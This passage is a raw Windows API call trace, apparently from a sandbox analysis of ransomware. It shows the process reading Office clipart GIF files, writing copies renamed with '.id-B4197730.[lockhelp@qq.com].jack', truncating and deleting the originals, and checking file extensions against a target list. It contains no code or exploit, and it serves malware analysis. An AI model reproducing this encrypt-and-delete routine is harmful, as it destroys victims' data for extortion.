[0207.730] CloseHandle (hObject=0x438) returned 1 [0207.733] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.733] SetEndOfFile (hFile=0x40c) returned 1 [0207.734] CloseHandle (hObject=0x40c) returned 1 [0207.734] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.734] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif")) returned 1 [0208.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0208.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0208.565] lstrlenW (lpString=".doc") returned 4 [0208.565] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0208.565] lstrlenW (lpString=".docx") returned 5 [0208.565] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0208.565] lstrlenW (lpString=".pdf") returned 4 [0208.565] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0208.565] lstrlenW (lpString=".xls") returned 4 [0208.565] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0208.565] lstrlenW (lpString=".xlsx") returned 5 [0208.565] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0208.565] lstrlenW (lpString=".ppt") returned 4 [0208.565] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0208.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0208.565] lstrlenW (lpString=".zip") returned 4 [0208.565] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0208.565] lstrlenW (lpString=".rar") returned 4 [0208.565] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0208.565] lstrlenW (lpString=".bz2") returned 4 [0208.565] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0208.566] lstrlenW (lpString=".7z") returned 3 [0208.566] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0208.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0208.566] lstrlenW (lpString=".dbf") returned 4 [0208.566] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0208.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0208.566] lstrlenW (lpString=".1cd") returned 4 [0208.566] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0208.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0208.566] lstrlenW (lpString=".jpg") returned 4 [0208.566] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0208.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0208.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0208.566] lstrlenW (lpString=".doc") returned 4 [0208.566] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0208.566] lstrlenW (lpString=".docx") returned 5 [0208.566] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0208.566] lstrlenW (lpString=".pdf") returned 4 [0208.566] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0208.566] lstrlenW (lpString=".xls") returned 4 [0208.566] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0208.566] lstrlenW (lpString=".xlsx") returned 5 [0208.566] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0208.566] lstrlenW (lpString=".ppt") returned 4 [0208.566] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0208.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0208.566] lstrlenW (lpString=".zip") returned 4 [0208.567] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0208.567] lstrlenW (lpString=".rar") returned 4 [0208.567] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0208.567] lstrlenW (lpString=".bz2") returned 4 [0208.567] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0208.567] lstrlenW (lpString=".7z") returned 3 [0208.567] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0208.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0208.567] lstrlenW (lpString=".dbf") returned 4 [0208.567] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0208.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0208.567] lstrlenW (lpString=".1cd") returned 4 [0208.567] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0208.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0208.567] lstrlenW (lpString=".jpg") returned 4 [0208.567] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0208.567] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0208.567] lstrlenW (lpString="AG00092_.GIF") returned 12 [0208.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0208.764] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=502) returned 1 [0208.764] CloseHandle (hObject=0x424) returned 1 [0208.764] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif")) returned 0x220 [0208.764] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0208.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0208.764] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.765] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0208.765] GetLastError () returned 0x0 [0208.765] ReadFile (in: hFile=0x424, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x1f6, lpOverlapped=0x0) returned 1 [0208.766] WriteFile (in: hFile=0x3ec, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x200, lpOverlapped=0x0) returned 1 [0208.778] ReadFile (in: hFile=0x424, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0208.778] WriteFile (in: hFile=0x3ec, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xec, lpOverlapped=0x0) returned 1 [0209.355] SetEndOfFile (hFile=0x3ec) returned 1 [0209.355] CloseHandle (hObject=0x3ec) returned 1 [0209.355] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.356] SetEndOfFile (hFile=0x424) returned 1 [0209.357] CloseHandle (hObject=0x424) returned 1 [0209.357] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0209.357] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00092_.gif")) returned 1 [0209.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0209.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0209.357] lstrlenW (lpString=".doc") returned 4 [0209.357] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.357] lstrlenW (lpString=".docx") returned 5 [0209.357] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.358] lstrlenW (lpString=".pdf") returned 4 [0209.358] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.358] lstrlenW (lpString=".xls") returned 4 [0209.358] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.358] lstrlenW (lpString=".xlsx") returned 5 [0209.358] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.358] lstrlenW (lpString=".ppt") returned 4 [0209.358] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0209.358] lstrlenW (lpString=".zip") returned 4 [0209.358] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.358] lstrlenW (lpString=".rar") returned 4 [0209.358] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.358] lstrlenW (lpString=".bz2") returned 4 [0209.358] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.358] lstrlenW (lpString=".7z") returned 3 [0209.358] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0209.358] lstrlenW (lpString=".dbf") returned 4 [0209.358] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0209.358] lstrlenW (lpString=".1cd") returned 4 [0209.358] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0209.358] lstrlenW (lpString=".jpg") returned 4 [0209.358] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0209.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0209.359] lstrlenW (lpString=".doc") returned 4 [0209.359] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.359] lstrlenW (lpString=".docx") returned 5 [0209.359] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.359] lstrlenW (lpString=".pdf") returned 4 [0209.359] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.359] lstrlenW (lpString=".xls") returned 4 [0209.359] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.359] lstrlenW (lpString=".xlsx") returned 5 [0209.359] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.359] lstrlenW (lpString=".ppt") returned 4 [0209.359] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0209.359] lstrlenW (lpString=".zip") returned 4 [0209.359] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.359] lstrlenW (lpString=".rar") returned 4 [0209.359] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.359] lstrlenW (lpString=".bz2") returned 4 [0209.359] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.359] lstrlenW (lpString=".7z") returned 3 [0209.359] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0209.359] lstrlenW (lpString=".dbf") returned 4 [0209.359] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0209.359] lstrlenW (lpString=".1cd") returned 4 [0209.359] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 68 [0209.360] lstrlenW (lpString=".jpg") returned 4 [0209.360] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.360] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0209.360] lstrlenW (lpString="AG00126_.GIF") returned 12 [0209.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0209.360] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=3140) returned 1 [0209.360] CloseHandle (hObject=0x424) returned 1 [0209.360] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif")) returned 0x220 [0209.360] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0209.361] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.361] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0209.361] GetLastError () returned 0x0 [0209.361] ReadFile (in: hFile=0x424, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0xc44, lpOverlapped=0x0) returned 1 [0209.552] WriteFile (in: hFile=0x3ec, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xc50, lpOverlapped=0x0) returned 1 [0209.552] ReadFile (in: hFile=0x424, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0209.553] WriteFile (in: hFile=0x3ec, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xec, lpOverlapped=0x0) returned 1 [0209.553] SetEndOfFile (hFile=0x3ec) returned 1 [0209.553] CloseHandle (hObject=0x3ec) returned 1 [0209.558] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.558] SetEndOfFile (hFile=0x424) returned 1 [0209.559] CloseHandle (hObject=0x424) returned 1 [0209.559] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0209.559] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif")) returned 1 [0209.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0209.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0209.560] lstrlenW (lpString=".doc") returned 4 [0209.560] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.560] lstrlenW (lpString=".docx") returned 5 [0209.560] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.560] lstrlenW (lpString=".pdf") returned 4 [0209.560] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.560] lstrlenW (lpString=".xls") returned 4 [0209.560] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.560] lstrlenW (lpString=".xlsx") returned 5 [0209.560] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.560] lstrlenW (lpString=".ppt") returned 4 [0209.560] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0209.560] lstrlenW (lpString=".zip") returned 4 [0209.560] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.560] lstrlenW (lpString=".rar") returned 4 [0209.560] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.560] lstrlenW (lpString=".bz2") returned 4 [0209.560] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.561] lstrlenW (lpString=".7z") returned 3 [0209.561] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0209.561] lstrlenW (lpString=".dbf") returned 4 [0209.561] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0209.561] lstrlenW (lpString=".1cd") returned 4 [0209.561] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0209.561] lstrlenW (lpString=".jpg") returned 4 [0209.561] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0209.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0209.561] lstrlenW (lpString=".doc") returned 4 [0209.561] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.561] lstrlenW (lpString=".docx") returned 5 [0209.561] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.561] lstrlenW (lpString=".pdf") returned 4 [0209.561] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.561] lstrlenW (lpString=".xls") returned 4 [0209.561] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.561] lstrlenW (lpString=".xlsx") returned 5 [0209.561] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.561] lstrlenW (lpString=".ppt") returned 4 [0209.561] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0209.561] lstrlenW (lpString=".zip") returned 4 [0209.562] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.562] lstrlenW (lpString=".rar") returned 4 [0209.562] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.562] lstrlenW (lpString=".bz2") returned 4 [0209.562] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.562] lstrlenW (lpString=".7z") returned 3 [0209.562] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0209.562] lstrlenW (lpString=".dbf") returned 4 [0209.562] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0209.562] lstrlenW (lpString=".1cd") returned 4 [0209.562] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0209.562] lstrlenW (lpString=".jpg") returned 4 [0209.562] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.562] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0209.562] lstrlenW (lpString="AG00130_.GIF") returned 12 [0209.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0209.563] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=5253) returned 1 [0209.563] CloseHandle (hObject=0x424) returned 1 [0209.563] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif")) returned 0x220 [0209.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0209.564] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.564] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0209.564] GetLastError () returned 0x0 [0209.564] ReadFile (in: hFile=0x424, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x1485, lpOverlapped=0x0) returned 1 [0209.763] WriteFile (in: hFile=0x3ec, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x1490, lpOverlapped=0x0) returned 1 [0209.765] ReadFile (in: hFile=0x424, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0209.765] WriteFile (in: hFile=0x3ec, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xec, lpOverlapped=0x0) returned 1 [0209.765] SetEndOfFile (hFile=0x3ec) returned 1 [0209.765] CloseHandle (hObject=0x3ec) returned 1 [0209.766] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.766] SetEndOfFile (hFile=0x424) returned 1 [0209.767] CloseHandle (hObject=0x424) returned 1 [0209.767] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF.id-B4197730.[lockhelp@qq.com].jack", 